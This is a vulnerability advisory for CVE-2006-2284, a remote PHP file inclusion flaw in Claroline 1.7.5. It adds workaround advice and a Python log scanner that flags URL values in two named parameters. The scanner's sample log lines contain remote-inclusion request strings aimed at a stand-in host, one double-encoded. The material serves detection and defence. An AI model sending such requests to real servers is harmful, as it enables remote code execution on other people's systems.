PT-2006-3250 · Claroline · Claroline

Beford · Published 2006-05-09 · Updated 2018-10-18 · CVE-2006-2284

CVSS v2.0: 6.8 (Medium)

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

Claroline version 1.7.5

Description

The issue allows remote attackers to execute arbitrary PHP code. This is achieved via a URL in the clarolineRepositorySys parameter in 'ldap.inc.php' and the claro_CasLibPath parameter in 'casProcess.inc.php'.

Recommendations

For Claroline version 1.7.5, consider disabling the clarolineRepositorySys parameter in 'ldap.inc.php' and the claro_CasLibPath parameter in 'casProcess.inc.php' as a temporary workaround until a patch is available. Restrict access to 'ldap.inc.php' and 'casProcess.inc.php' to minimize the risk of exploitation. Avoid using the clarolineRepositorySys and claro_CasLibPath parameters in the affected API endpoints until the issue is resolved.
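
A log check for the request pattern described above, as an added example (not part of the original advisory or of Claroline's code): it flags direct requests to the two named scripts whose parameter value is a URL. The log lines, hosts and directory paths are constructed, and the underscore spelling claro_CasLibPath is assumed from the CVE-2006-2284 description.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script -> parameter pairs named in the advisory. The underscore in
# claro_CasLibPath follows the CVE-2006-2284 description (assumption).
WATCH = {
    "ldap.inc.php": "clarolineRepositorySys",
    "casProcess.inc.php": "claro_CasLibPath",
}
# A value that starts with "scheme://" is a URL rather than a local path.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request field of an Apache/nginx combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious(line):
    """Return (script, param, value) when a watched script is requested
    with its watched parameter set to a URL, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = WATCH.get(script)
    if param is None:
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoding
        if key == param and REMOTE.match(value):
            return (script, param, value)
    return None

def scan(lines):
    """Collect every hit from an iterable of log lines."""
    return [hit for hit in map(suspicious, lines) if hit]

# Constructed sample lines; /lms/x/ is a placeholder directory.
SAMPLE = [
    '203.0.113.7 - - [09/May/2006:10:00:01 +0000] "GET /lms/x/ldap.inc.php?clarolineRepositorySys=http://host.example/a HTTP/1.1" 200 512',
    '203.0.113.7 - - [09/May/2006:10:00:02 +0000] "GET /lms/x/casProcess.inc.php?claro_CasLibPath=http%253A%252F%252Fhost.example%252Fa HTTP/1.1" 200 512',
    '198.51.100.4 - - [09/May/2006:10:00:03 +0000] "GET /lms/x/ldap.inc.php?clarolineRepositorySys=../inc/ HTTP/1.1" 200 512',
    '198.51.100.4 - - [09/May/2006:10:00:04 +0000] "GET /lms/index.php?clarolineRepositorySys=http://host.example/a HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.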


Related identifiers

CVE-2006-2284

Affected products

Claroline